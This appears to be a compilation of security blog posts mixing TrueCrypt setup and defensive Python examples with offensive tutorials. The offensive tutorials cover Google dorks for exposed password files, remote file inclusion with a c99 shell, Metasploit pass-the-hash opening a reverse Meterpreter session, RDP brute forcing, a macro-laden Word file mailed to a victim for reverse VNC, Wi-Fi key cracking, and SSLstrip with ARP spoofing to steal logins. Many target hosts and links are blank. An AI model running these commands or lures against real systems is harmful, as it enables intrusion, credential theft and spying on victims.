
TrueCrypt - Protect Sensitive Data

TrueCrypt is an open-source, cross-platform program that allows you to create protected storage volumes, in which you can safely keep your secret files. It's important to understand that TrueCrypt does not selectively encrypt files; rather, it creates a sort of encrypted folder that protects anything in it. This folder, known as a storage volume, must be mounted with TrueCrypt and requires a password to be accessed.

Main features:
  • Creates a virtual encrypted disk within a file and mounts it as a real disk.
  • Encrypts an entire partition or storage device such as USB flash drive or hard drive.
  • Encrypts a partition or drive where Windows is installed (pre-boot authentication).
  • Encryption is automatic, real-time (on-the-fly) and transparent.
  • Parallelization and pipelining allow data to be read and written as fast as if the drive was not encrypted.
  • Encryption can be hardware-accelerated on modern processors.
  • Provides plausible deniability, in case an adversary forces you to reveal the password.
  • Hidden volume (steganography) and hidden operating system.
Step 1
Download, install and start TrueCrypt

Step 2
TrueCrypt program window >> Menu bar >> Volumes >> Create New Volume...

Step 3
Follow the instructions of the TrueCrypt Volume Creation Wizard, using the defaults:

Choose the name and location of your virtual file:

Use the default AES encryption which is quite strong:

When specifying the size, check the appropriate box (KB, MB, or GB) and then enter a number next to it, e.g. 4 GB or 4096 MB:

Set a password for your volume. You can also use keyfiles, such as an image file, as a second authentication factor:

Check the box if you are going to store files larger than 4 GB:

Use NTFS as the volume format:

Step 4
Finally, when you want to use the disk, just select a drive letter and enter your password to mount the encrypted virtual file:

You'll get a disk partition at your disposal that can be accessed from your account until you dismount it, reboot, shut down, log off, or turn the power off.

Google - Hacker's Best Friend

Search engines have long been a good helper for people trying to find sensitive information or vulnerabilities on the web. When a few billion documents are indexed, it is inevitable that some things which should remain private inadvertently end up in public directories and get indexed; then it's just a matter of writing a sufficiently creative search query to find that data.

Google search can be a very useful tool for gathering information about a target system. It can be used to locate security vulnerabilities and misconfigurations. Google hacking, on the other hand, is the term used when a hacker tries to find vulnerable targets or sensitive data by using the Google search engine.

Here is a list of Google advanced search operators, operator combinations and related uses:

link:URL: lists other pages that link to the URL.
related:URL: lists other pages related to the URL.
site: restricts search results to the given domain.
allinurl:WORDS: shows only pages with all the search terms in the URL.
inurl:WORDS: like allinurl, but filters the URL based on the first term only.
allintitle:WORDS: shows only results with all the terms in the title.
intitle:WORD: similar to allintitle, but only for the next word.
cache:URL: shows the Google cached version of the URL.
backlink:URL: shows backlinks and pages containing the URL.
filetype:SOMEFILETYPE: restricts searches to that file type.
-filetype:SOMEFILETYPE: removes that file type from the search.
site:"": shows you how many pages of your site are indexed by Google.
allintext:: searches only within the text of pages, not in the links or page title.
allinlinks:: searches only within links, not text or title.
WordA OR WordB: searches for either word A or word B.
"Word" OR "Phrase": searches for the exact word or phrase.
WordA -WordB: finds word A but filters out results that include word B.
WordA +WordB: results must contain both word A and word B.
~WORD: looks up the word and its synonyms.
~WORD -WORD: looks up only the synonyms of the word.

Google hacking techniques:

Index of - Using “Index of ” syntax to find sites enabled with Index browsing

Index.of /admin
Index.of /passwd
Index.of /password
Index.of /mail
“Index of /” +passwd
“Index of /” +password.txt
“Index of /” +.htaccess
“Index of /secret”
“Index of /confidential”
“Index of /root”
“Index of /cgi-bin”
“Index of /credit-card”
“Index of /logs”
“Index of /config”

inurl or allinurl - Search Google based on the URL

inurl:admin filetype:txt
inurl:admin filetype:db
inurl:admin filetype:cfg
inurl:mysql filetype:cfg
inurl:passwd filetype:txt
inurl:gov filetype:xls “restricted”

intitle or allintitle - Search Google using the page title

intitle:”Index of” .sh_history
intitle:”Index of” .bash_history
intitle:”index of” passwd
intitle:”index of” people.lst
intitle:”index of” pwd.db
intitle:”index of” etc/shadow
intitle:”index of” spwd
intitle:”index of” master.passwd
intitle:”index of” htpasswd
intitle:”index of” members OR accounts
intitle:”index of” user_carts OR user_cart

allintitle: sensitive filetype:doc
allintitle: restricted filetype:mail
allintitle: restricted filetype:doc site:gov

Example usage of Google hacking techniques:

Remote Services:
"VNC Desktop" inurl:5800
intitle:"Terminal Services Web Connection"

PhpMyAdmin page
"phpMyAdmin" inurl:"main.php"

Sensitive information filetype:pdf | doc | xls | ppt | txt
filetype:log inurl:"password.log"

Admin page
inurl:admin intitle:login

Music, Video or Ebooks
Find Music:
-inurl:(htm|html|php) intitle:"index of" + "last modified" + "parent directory" + description+size=(wma|mp3) "nirvana"

Find Videos:
-inurl:(htm|html|php) intitle:"index of" + "last modified" + "parent directory" +description+size_(mpg|wmv) "matrix"

Find Ebooks:
-inurl:(htm|html|php) intitle:"index of" + "last modified" + "parent directory" +description+size_(pdf|doc) "google hacking"
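The dorks above all hunt for the same thing from the outside: directory listings and well-known sensitive file names that were never meant to be published. The quickest defence is to run the same search from the inside, against your own web root, before a search engine does. The following is an added example, not code from the original page; it walks a web root, flags file and directory names matching the patterns the dorks target, and checks whether an Apache `.htaccess` leaves directory listing (`Options +Indexes`) switched on. The name lists, the regexes, and the temporary demo tree it builds are this example's own constructions.

```python
import os
import re
import tempfile
from pathlib import Path

# Names and patterns taken from the directory-listing dorks above; the regexes are this
# example's own approximation of what those queries look for.
SENSITIVE_NAMES = {
    "passwd", "password.txt", ".htaccess", "htpasswd", ".sh_history", ".bash_history",
    "pwd.db", "master.passwd", "shadow", "people.lst", "password.log", "user_carts",
}
SENSITIVE_PATTERNS = [
    re.compile(r"\.(db|cfg|log|bak|sql)$", re.IGNORECASE),
    re.compile(r"(passwd|password|secret|credit.?card)", re.IGNORECASE),
]
SENSITIVE_DIRS = {"admin", "secret", "confidential", "logs", "config", "credit-card", "mail"}

def audit_webroot(root) -> list:
    """Walk a web root and return sorted (relative_path, reason) pairs for every hit."""
    root = Path(root)
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        rel_dir = Path(dirpath).relative_to(root)
        for d in dirnames:
            if d.lower() in SENSITIVE_DIRS:
                findings.append((str(rel_dir / d), "sensitive directory name"))
        for f in filenames:
            rel = str(rel_dir / f)
            if f.lower() in SENSITIVE_NAMES:
                findings.append((rel, "well-known sensitive filename"))
                continue
            for pat in SENSITIVE_PATTERNS:
                if pat.search(f):
                    findings.append((rel, f"matches /{pat.pattern}/"))
                    break
    return sorted(findings)

def indexes_enabled(htaccess_text: str) -> bool:
    """True if an Apache Options directive in the text leaves directory listing enabled."""
    enabled = False
    for line in htaccess_text.splitlines():
        parts = line.split()
        if not parts or parts[0].lower() != "options":
            continue
        for tok in parts[1:]:
            if tok.lower() in ("indexes", "+indexes"):
                enabled = True
            elif tok.lower() == "-indexes":
                enabled = False
    return enabled

def build_demo_root() -> Path:
    """Constructed web root in a temp dir, mirroring what the dorks above hunt for."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    (root / "admin").mkdir()
    (root / "admin" / "users.db").write_text("id,user\n")
    (root / "backup").mkdir()
    (root / "backup" / "password.txt").write_text("constructed sample, not a real secret\n")
    (root / "index.html").write_text("<html></html>\n")
    (root / ".htaccess").write_text("Options +Indexes\n")
    return root

if __name__ == "__main__":
    demo = build_demo_root()
    for path, reason in audit_webroot(demo):
        print(f"{path}: {reason}")
    print("directory listing enabled:", indexes_enabled((demo / ".htaccess").read_text()))
```

Point it at the real document root instead of the demo tree; anything it reports is either a candidate for removal from the web root or for an explicit deny rule, and `Options -Indexes` (or the equivalent on other servers) removes the listings the `Index of` dorks depend on.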

For more examples, you can visit google hacking database here:

Download Google Hacking for Penetration Testers Vol.2 here:

Website Hacking with Remote File Inclusion

Remote File Inclusion

Remote file inclusion is one of the most common vulnerabilities found in web applications. This type of vulnerability allows an attacker to make the web server include a remote file. If the attack succeeds, the attacker gains access to the web server and can execute any command on it.

First of all we need to find a vulnerable website. We can use the following Google dork to search for us:


This will show all the pages which have "index.php?page=" in their URL. Now, to test whether the website is vulnerable to Remote File Inclusion or not, the hacker uses the following command:

If, after executing the command, the Facebook homepage shows up, then the website is vulnerable to this attack; if it does not come up, then you should look for a new target.

Once we know that the website is vulnerable to the attack, we will include the c99 shell. To do this, download the c99 shell and then upload it to a web hosting site such as, etc.

You can download the c99 here:

Once the shell is uploaded you will have a unique URL for your shell; let's say it is

Now here is the command a hacker would execute to gain access:

Remember to add "?" at the end of the URL or else the shell will not execute. Now the hacker is inside the website and can do anything with it.
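The root cause of everything above is a single line of the form `include($_GET['page'])`: whatever the client puts in the parameter is handed straight to the include mechanism. Below is an added example, not code from the page, that shows the same pattern in Python beside a hardened version. The vulnerable function mirrors the PHP idiom (a URL in the parameter becomes a remote include); the hardened one treats the parameter as a key into a fixed allow-list and additionally checks that the resolved file stays under the templates directory. The page names, `ALLOWED_PAGES`, the temporary templates directory and the sample URLs are this example's constructions.

```python
import tempfile
from pathlib import Path

# VULNERABLE: the PHP idiom include($_GET['page']) rendered in Python. The parameter is
# used as-is, so a value such as "http://example.invalid/c99.txt?" becomes a remote include.
def include_page_vulnerable(page: str) -> tuple:
    if page.lower().startswith(("http://", "https://", "ftp://")):
        return ("remote", page)     # with allow_url_include=On PHP would fetch and execute this
    return ("local", page)          # otherwise an arbitrary local path is included

# HARDENED: the parameter is a key into a fixed allow-list, never a path, and the
# resolved file must still live under the templates directory.
ALLOWED_PAGES = {"home": "home.html", "about": "about.html", "contact": "contact.html"}

def include_page_safe(page: str, templates_dir) -> str:
    filename = ALLOWED_PAGES.get(page)
    if filename is None:
        raise ValueError(f"unknown page {page!r}")
    base = Path(templates_dir).resolve()
    target = (base / filename).resolve()
    if base not in target.parents:
        raise ValueError("template resolves outside the templates directory")
    return target.read_text()

def make_templates() -> Path:
    """Constructed templates directory for the demo."""
    d = Path(tempfile.mkdtemp(prefix="templates-"))
    for name in ALLOWED_PAGES.values():
        (d / name).write_text(f"<h1>{name.removesuffix('.html').title()}</h1>\n")
    return d

def probe(page: str, templates_dir) -> str:
    """Show how each version treats the same parameter value."""
    try:
        include_page_safe(page, templates_dir)
        safe = "served"
    except ValueError as e:
        safe = f"rejected ({e})"
    return f"vulnerable={include_page_vulnerable(page)[0]} hardened={safe}"

if __name__ == "__main__":
    templates = make_templates()
    for value in ("home", "http://example.invalid/c99.txt?", "../../../etc/passwd"):
        print(f"{value!r}: {probe(value, templates)}")
```

On the PHP side the configuration equivalents are `allow_url_include=Off` (the default since PHP 5.2) and ideally `allow_url_fopen=Off`, but those only close the remote case; the allow-list is what also stops local file inclusion through the same parameter.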

Web Browser Security Tests

The browser remains our main portal for viewing the web. It's the main entry point for malware, Trojans, and other browser attacks. To make sure that your online activities are protected, you can run browser security tests to determine how freely private information is being leaked.

ScanIt puts your browser through 19 vulnerability tests. You can run all tests in one go, choose individual tests, or test for bugs specific to the browser (e.g. Firefox has 10 tests). The browser scanning tool supports Firefox, IE, and Opera. The FAQ will give newbies an idea of why browser vulnerability tests are important and the dangers of browser bugs.

Qualys Browser Check
Qualys uses a plugin to check for exploitable weaknesses in the browser. Qualys checks Firefox, Chrome, and Internet Explorer for potential vulnerabilities and security holes in your browser and its plugins. It flags insecure and out-of-date versions that put you at risk with colour codes such as red for 'Insecure' or 'Obsolete'.

For any item that is insecure or out of date, a Fix It button appears. Simply click the Fix It button to download the latest update to fix your security issue.
A collection of online tests that show you how much personal information can be collected from your browser just by visiting a Web page. can tell you all kinds of detailed information about you and your browser. Information ranging from simple stuff like the name and version of your browser to more detailed stuff like what kind of fonts you have installed and what hardware you’re running on.

PC Flank
The PC Flank Web site incorporates several tests that look at overall computer security as viewed from the Internet. The checks include Stealth Test, Advanced Port Scanner Test, Trojans Test, Exploits Test, and Browser Test. Once more, I want to focus on testing the Web browser. PC Flank tries to determine whether the Web browser gives up any personal information, location details, or specifics about your ISP.

Belarc Advisor - Windows Auditing Tool

The Belarc Advisor builds a detailed profile of your installed software and hardware, missing Microsoft hotfixes, anti-virus status, CIS (Center for Internet Security) benchmarks, and displays the results in your Web browser.

The program creates an HTML report that not only tells you everything you could possibly want to know about the hardware on your system, but also what you might need to know about the software that's installed. Gathered info includes motherboard type and revision, CPU and GPU info, drive space, Microsoft hotfixes, operating system revision, and Web browser vulnerabilities, as well as third-party software installs.

If you are missing any crucial hotfixes, they will appear in the Missing Microsoft Security Hotfixes section. In the Installed Hotfixes section, you can see that the hotfixes are broken out by category and each entry contains the Knowledge Base ID number and the date on which it was installed.

My favorite Belarc Advisor feature by far is its CIS benchmarks. I find it a very handy tool for auditing Windows machines. It is very easy to use, very informative, and a nice tool to have in your PC arsenal. Belarc runs on Windows 7, 2008 R2, Vista, 2008, 2003, XP, 2000, NT 4, Me, 98, and 95. Both 32-bit and 64-bit Windows are supported.

You can download Belarc Advisor here:

Pass the Hash Attack with Metasploit

Windows systems usually store the NTLM hash right alongside the LM hash, the NTLM hash being the more secure of the two. When a system is compromised with Administrator or SYSTEM level access, an attacker will often take a copy of the password hashes for off-line hash cracking. However, what if the passwords that were chosen are very strong and not crackable in a realistic time-frame?

Sometimes we do not need to crack them. We can simply take the hash as-is and use it as a token to access the system. This technique is called “Pass the Hash”. The same password hashes can be used for authentication, either to the same previously compromised system or to other systems that share the same password.

For example:


Having found that the NTLM hash is not crackable in a reasonable time by brute force or rainbow tables, we may abandon cracking the hash as unfeasible. However, we can reuse the password hash "as is" to re-authenticate to the Windows system using SMB. Metasploit has a cool module, "exploit/windows/smb/psexec", which authenticates using SMB, then uploads and runs a payload. In the following example we use Meterpreter as the payload:

/pentest/exploits/framework3/msfcli exploit/windows/smb/psexec PAYLOAD=windows/meterpreter/reverse_tcp LHOST= LPORT=443 RHOST= SMBUser=Administrator SMBPass=aad3b435b51404eeaad3b435b51404ee:7d3f11711c610f013c06959a5e98f2fd E

[*] Please wait while we load the module tree...
[*] Started reverse handler on
[*] Connecting to the server...
[*] Authenticating as user 'Administrator'...
[*] Uploading payload...
[*] Created \CpdYVAFa.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (eHIqItmA - "MhEHHIQNUFjnuuJarbnQlnIjpA")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Sending stage (748544 bytes) to
[*] Closing service handle...
[*] Deleting \CpdYVAFa.exe...
[*] Meterpreter session 1 opened ( ->

meterpreter >

This attack could be used against any system that has an account with the same password and port 445 open. You can watch the video tutorial below:

Terminal Services Brute Force Tools

Terminal Services, though considered safe, are susceptible to brute force attacks. Personally, I have been using TSGrinder to brute force my way into the server. Recently, I found that Ncrack can pretty much do the same thing.

TSGrinder is a "dictionary" based attack tool, but it does have some interesting features like "l337" conversion, and supports multiple attack windows from a single dictionary file. It supports multiple password attempts in the same connection, and allows you to specify how many times to try a username/password combination within a particular connection.

tsgrinder.exe -w dictionary-file -l leet -d workgroup -u administrator -b -n 2 <IP_Address>

You can watch TSGrinder in action here:

The tool is available for download here:

The tool also requires the Microsoft Simulated Terminal Server Client tool, “roboclient,” which may be found here:

Similar to TSGrinder, Ncrack can be used to crack the Remote Desktop Protocol on all Windows versions from XP and above, with the introduction of its RDP module. Keep in mind that against an XP machine you can only have one connection at a time, so you'll have to set the Connection Limit value to 1 (CL=1).

ncrack -vv -d7 CL=10 --user administrator

You can use the -U option to pass a username file and -P for a password file. Otherwise, Ncrack will use its default password file.

Domain Enumeration Techniques

Sometimes when doing penetration testing, you are provided with very minimum information such as the domain name of the target. Obviously, having one target address will most likely reduce your chances of penetrating the network. One of the techniques you can use to expand your target list is domain enumeration. This technique is used to gather as much information as possible about the target domain.

This method is known as passive information gathering because it is non-intrusive. We are not actively probing the target network but instead using publicly available information on the Internet. There are several ways to do this, but I'm going to share with you the ones that I normally use. I usually start with the online tools to enumerate the target domain. Let's say your target domain name is

Google: hacker's best friend
Use the search string "allinurl: -www" to return all domain names associated with the target.

Netcraft DNS search function

Checks domains for existing subdomains and hostnames.

Next, I will use enumeration tools that are available in BackTrack.

Tool for gathering e-mail accounts, user names and hostnames/subdomains from different public sources.
./ -d -b bing

Multithreaded Perl script to enumerate DNS information on a domain and to discover non-contiguous IP blocks.
./ --enum -f dns.txt

Fierce is a semi-lightweight scanner that helps locate non-contiguous IP space and hostnames against specified domains.
./fierce -dns -wordlist host.txt

Below you can see a comparison table of the results produced by each tool.

Next, we need to validate the results and remove any duplicate records. We started with only one target, i.e. but after performing domain enumeration we are presented with plenty of targets to attack.
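The validate-and-deduplicate step above is the part that usually ends up done by hand, so here is an added example (not code from the page or from any of the three tools) that does it programmatically. It extracts hostname/IP pairs from three loosely formatted tool outputs, merges them into one list keyed by hostname with the IPs and the tools that reported each, and sets aside anything outside the target domain so that an out-of-scope host never reaches the target list. The tool outputs, the documentation domain example.com and the IPs are constructed for the example and only imitate each tool's print format.

```python
import re

# Constructed outputs in the style each tool prints for the documentation domain
# example.com; these are not real tool runs.
HARVESTER_OUT = """\
Hosts found:
www.example.com:192.0.2.10
mail.example.com:192.0.2.20
"""
DNSENUM_OUT = """\
www.example.com.    3600  IN  A  192.0.2.10
vpn.example.com.    3600  IN  A  192.0.2.30
"""
FIERCE_OUT = """\
192.0.2.20\tmail.example.com
192.0.2.40\tdev.example.com
203.0.113.5\twww.example.org
"""

HOST_RE = re.compile(r"[a-z0-9-]+(?:\.[a-z0-9-]+)+", re.IGNORECASE)
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

def extract_records(text: str) -> list:
    """Pull (hostname, ip-or-None) pairs out of loosely formatted tool output."""
    records = []
    for line in text.splitlines():
        ips = IP_RE.findall(line)
        for tok in HOST_RE.findall(line):
            host = tok.lower().rstrip(".")      # dnsenum prints FQDNs with a trailing dot
            if IP_RE.fullmatch(host):           # the host regex also matches dotted IPs
                continue
            records.append((host, ips[0] if ips else None))
    return records

def merge_results(outputs: dict, domain: str):
    """Merge per-tool output into one de-duplicated host list scoped to `domain`."""
    domain = domain.lower()
    merged, out_of_scope = {}, set()
    for source, text in outputs.items():
        for host, ip in extract_records(text):
            if host != domain and not host.endswith("." + domain):
                out_of_scope.add(host)
                continue
            entry = merged.setdefault(host, {"ips": set(), "sources": set()})
            if ip:
                entry["ips"].add(ip)
            entry["sources"].add(source)
    return dict(sorted(merged.items())), out_of_scope

DEMO_OUTPUTS = {"theharvester": HARVESTER_OUT, "dnsenum": DNSENUM_OUT, "fierce": FIERCE_OUT}

if __name__ == "__main__":
    hosts, dropped = merge_results(DEMO_OUTPUTS, "example.com")
    for host, info in hosts.items():
        print(f"{host:20} {','.join(sorted(info['ips'])):15} seen by {sorted(info['sources'])}")
    print("out of scope:", sorted(dropped))
```

Hosts seen by only one tool deserve a second look (a forward lookup at the very least) before they are treated as confirmed, and the out-of-scope set is worth keeping: it is the list of names that would have been attacked by mistake.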

Cheers :)

Reverse VNC Hidden in a Word File

Metasploit has a payload feature for a reverse VNC connection which can be hidden in a Word file to get the VNC desktop of the remote user. Credit goes to Punter of for this tutorial.

Metasploit will create a macro which will be embedded in a Word document. When a user opens the Word document, we get a reverse VNC connection to the target system. It is not required to install VNC on the victim's PC. You can also do this over the WAN, but you need to forward port 4444 on your modem or router.

1) Create a Macro to embed in Word

./msfpayload windows/vncinject/reverse_tcp LHOST= V > /tmp/punter.bas

2) Copy the punter.bas file to Windows and open MS Office 2003 –> Tools –> Macro –> Visual Basic Editor. Then go to File –> Import File, choose punter.bas, and save the document with a name such as macrogame.doc. You have to make the document name interesting enough for the victim to open the file. Now send this file to the victim via mail or USB.

3) In Backtrack, we have to open a listening port to receive the reverse connection from our victim. 

./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST= DisableCourtesyShell=True E

When the victim opens the file, he/she will be asked whether to run the macro. If the user accepts, the connection will be initiated and a VNC client will open on BackTrack.

You can also watch the video tutorial here:

Wifite - WiFi WEP/WPA Key Cracking Tool

Wifite has been designed specially for the BackTrack 4 RC1 distribution of Ubuntu. It helps you attack multiple WEP and WPA encrypted networks at the same time. This tool is customizable and can be automated with only a few arguments. This Python script can be trusted to run without supervision.

  • sorts targets by power (in dB); cracks closest access points first
  • all WPA handshakes are backed up (to’s working directory)
  • mid-attack options: stop during attack with Ctrl+C to use (continue, move onto next target, skip to cracking, exit)
  • numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc)
  • very customizable settings (timeouts, packets/sec, etc)
  • SKA support (untested)
  • finds devices in monitor mode; if none are found, prompts for selection
  • all passwords saved to log.txt
  • switching WEP attacks does not reset IVS
  • displays session summary at exit; shows any cracked keys
GUI mode (default)
Console mode

The tool can be run using the following commands:

Crack all WEP access points:
./ -all -nowpa

Crack all WEP access points with signal strength greater than (or equal to) 50dB:
./ -p 50 -nowpa

Attack all access points, use 'darkc0de.lst' for cracking WPA handshakes:
./ -all --dict /pentest/passwords/wordlists/darkc0de.lst

Attack all WPA access points, but do not try to crack -- any captured handshakes are saved automatically:
./ -all -nowpa --dict none

Crack all WEP access points greater than 50dB in strength, giving 15 minutes for each WEP attack method, and send packets at 600 packets/sec:
./ --power 50 -wepw 15 -pps 600

Attempt to crack the WEP-encrypted access point "2WIRE752" endlessly -- the program will not stop until the key is cracked or the user interrupts with ^C:
./ -e "2WIRE752" -wepw 0

You can download wifite here:

Security 101 - Choosing A Good Password

There are so many things that require passwords these days that remembering them all can be a real problem. Choosing the right password is something that many people find difficult. Maybe because of this reason a lot of people choose their passwords badly. A good password is one that's hard to guess, yet easy for you to remember. This video will show you some simple tips to assist you in choosing a good password.

How to choose a safe password - Explania

Nmap Scripting Engine

The Nmap Scripting Engine (NSE) is one of Nmap's most powerful and flexible features. It allows users to write (and share) simple scripts to automate a wide variety of networking tasks. Those scripts are then executed in parallel with the speed and efficiency you expect from Nmap. Users can rely on the growing and diverse set of scripts distributed with Nmap, or write their own to meet custom needs.

Nmap is really my favourite tool for scanning and with this feature added to nmap, it really does make my life easier when doing a lot of scanning. You can check the list of scripts that are currently available in nmap here.

The script can be run with the following command:
nmap -A -T4 --script default -vv

I'm running all scripts under the default category. You can also specify an individual script using --script <script name>.

The script output is shown below the port scan result. More on nmap scripting engine usage and example can be found here.

Ndiff - Utility for Comparing Nmap Scan Results

Ndiff is a tool to aid in the comparison of Nmap scans. Specifically, it compares two nmap scans and outputs the differences. It allows monitoring of your network(s) for interesting changes in port states and visible hosts.

Many people like to scan their networks regularly (daily, weekly, etc.) and then use ndiff to easily detect any changes. The first step is to obtain a baseline of accessible systems and services. The follow-on scans will then identify discrepancies from the baseline, alerting your organisation to these changes.

Ndiff can produce output in human-readable text or machine-readable XML formats. The scans, ndiff run, and emailed report are often automated using tools such as cron on UNIX or the Scheduled Tasks tool on Windows. It should be useful to network administrators, security analysts, and other interested parties who need to monitor large networks in an organised fashion.

You can run Ndiff from Zenmap (GUI based) under the Tools tab

or using the good old command line:
ndiff scan1.xml scan2.xml

The highlighted output shows the difference in the scan results. The first scan shows the ssh and telnet ports were open on host ( but the second scan shows both ports are closed.
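For the "scan regularly, alert on changes" workflow described above, it helps to see what Ndiff is actually comparing. The following is an added example, not Ndiff's code: it parses two Nmap XML outputs (`-oX`), keeps the hosts reported up with their per-port states, and reports host appearances/disappearances and port-state transitions in the same spirit as the `ndiff scan1.xml scan2.xml` run above. The two XML documents are constructed and trimmed to the elements the comparison needs (the ssh and telnet ports closing on one host, as in the page's own scans, plus a new host appearing); addresses are documentation ranges.

```python
import xml.etree.ElementTree as ET

# Two constructed Nmap XML outputs, reduced to what the comparison needs; not real scans.
SCAN1 = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -oX scan1.xml 192.0.2.0/28">
  <host><status state="up"/><address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
      <port protocol="tcp" portid="23"><state state="open"/><service name="telnet"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
    </ports>
  </host>
</nmaprun>
"""
SCAN2 = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -oX scan2.xml 192.0.2.0/28">
  <host><status state="up"/><address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="closed"/><service name="ssh"/></port>
      <port protocol="tcp" portid="23"><state state="closed"/><service name="telnet"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
    </ports>
  </host>
  <host><status state="up"/><address addr="192.0.2.11" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
    </ports>
  </host>
</nmaprun>
"""

def parse_scan(xml_text: str) -> dict:
    """Return {addr: {(proto, port): (state, service)}} for every host reported up."""
    hosts = {}
    for host in ET.fromstring(xml_text).iter("host"):
        status = host.find("status")
        addr = host.find("address[@addrtype='ipv4']")
        if status is None or status.get("state") != "up" or addr is None:
            continue
        ports = {}
        for port in host.iter("port"):
            state = port.find("state")
            service = port.find("service")
            ports[(port.get("protocol"), int(port.get("portid")))] = (
                state.get("state") if state is not None else None,
                service.get("name") if service is not None else "",
            )
        hosts[addr.get("addr")] = ports
    return hosts

def diff_scans(old_xml: str, new_xml: str) -> list:
    """List (addr, what, before, after) tuples for host and port-state changes."""
    old, new = parse_scan(old_xml), parse_scan(new_xml)
    changes = []
    for addr in sorted(set(old) | set(new)):
        if addr not in old:
            changes.append((addr, "host", None, "up"))
        elif addr not in new:
            changes.append((addr, "host", "up", None))
        o, n = old.get(addr, {}), new.get(addr, {})
        for key in sorted(set(o) | set(n)):
            before = o[key][0] if key in o else None
            after = n[key][0] if key in n else None
            if before != after:
                changes.append((addr, f"{key[0]}/{key[1]}", before, after))
    return changes

def render(changes: list) -> str:
    """Human-readable report; '-' marks a host or port absent from one of the scans."""
    return "\n".join(f"{addr} {what}: {before or '-'} -> {after or '-'}"
                     for addr, what, before, after in changes)

if __name__ == "__main__":
    print(render(diff_scans(SCAN1, SCAN2)))
```

Run from cron against last night's and today's `-oX` files, an empty `changes` list means nothing to look at, and a new host or a newly open port is the event worth paging on; Ndiff itself gives you the same with its `--xml` output if you would rather not maintain a parser.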

SSLstrip - SSL Hijacking Tool

HTTPS can easily be defeated by a MITM, using SSLStrip. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial.

Here is how the exploit works: right in the middle, the attacker forces the client to operate in an unencrypted mode by stripping the "s" from all the "HTTPS" he will find in the headers/html.

The hacker gets the plain-text credentials, connects to the server via HTTPS using those credentials, gets the response, decrypts it, and forwards that back to the client. Thus, the server is satisfied, since everything is "correctly" encrypted, while the client is forced to use an unencrypted communication channel, without even noticing it.

Basically, these are the things you need to do to get SSLstrip running on BackTrack.

1- Switch the attacker machine into IP forwarding mode so that it can forward the victim's packet to the right address.
    echo "1" > /proc/sys/net/ipv4/ip_forward

2- Set up iptables to redirect HTTP traffic to SSLstrip, so that all traffic connecting to port 80 is redirected to port 10000 (or any other port you wish to use, e.g. 8080)
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

3- Run SSLstrip and log to a file named secret
    python -w secret 

4- Run the arpspoof attack between the victim and the gateway
    arpspoof -i eth0 -t

That is really all that we have to do to compromise a network and sniff usernames and passwords. It takes a few commands in a Linux machine to be able to steal your "secure" information.
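SSLstrip works only because the browser is willing to follow an `http://` link to a site that should have been `https://`, and the server never told it otherwise. The HTTP Strict-Transport-Security header is the server-side answer: once a browser has seen it over a valid HTTPS connection it refuses plain HTTP for that host for `max-age` seconds, so a stripped link is upgraded before it leaves the browser. The following is an added example, not from the page or the SSLstrip project, that does two defender-side checks: it grades a set of response headers on whether HSTS is present and strong enough, and it scans a page as the victim would receive it for `http://` references to hosts that must be HTTPS-only (the signature of a rewritten link). The sample headers, the HTML and the host names are constructed.

```python
import re
from html.parser import HTMLParser

def parse_hsts(value: str) -> dict:
    """Split a Strict-Transport-Security header value into lower-cased directives."""
    directives = {}
    for part in value.split(";"):
        part = part.strip()
        if not part:
            continue
        name, _, val = part.partition("=")
        directives[name.strip().lower()] = val.strip().strip('"') if val else True
    return directives

def hsts_verdict(headers: dict, min_age: int = 31536000):
    """Judge whether a site's response headers let a returning browser refuse plain HTTP."""
    lower = {k.lower(): v for k, v in headers.items()}
    value = lower.get("strict-transport-security")
    if value is None:
        return False, "no HSTS header: every visit can be downgraded to http://"
    d = parse_hsts(value)
    try:
        max_age = int(d.get("max-age", 0))
    except (TypeError, ValueError):
        return False, "malformed max-age"
    if max_age == 0:
        return False, "max-age=0 switches HSTS off"
    if max_age < min_age:
        return False, f"max-age {max_age} is below the recommended {min_age}"
    if "includesubdomains" not in d:
        return True, "HSTS set, but subdomains are not covered"
    return True, "HSTS covers the host and its subdomains"

class _LinkCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        for name, val in attrs:
            if name in ("href", "src", "action") and val:
                self.links.append(val)

def downgraded_links(html: str, https_only_hosts: set) -> list:
    """Return links that reach a host which must be HTTPS-only over plain http://."""
    collector = _LinkCollector()
    collector.feed(html)
    hits = []
    for link in collector.links:
        m = re.match(r"http://([^/:?#]+)", link, re.IGNORECASE)
        if m and m.group(1).lower() in https_only_hosts:
            hits.append(link)
    return hits

# Constructed page as a victim would receive it after the rewrite: the login form's
# action has lost its "s". Host names are documentation names.
SAMPLE_HTML = """<html><body>
<a href="https://www.example.com/">Home</a>
<form action="http://login.example.com/auth" method="post"><input name="user"></form>
<a href="http://www.example.org/">unrelated site</a>
</body></html>"""

if __name__ == "__main__":
    print(hsts_verdict({"Strict-Transport-Security": "max-age=31536000; includeSubDomains"}))
    print(hsts_verdict({"Content-Type": "text/html"}))
    print(downgraded_links(SAMPLE_HTML, {"login.example.com"}))
```

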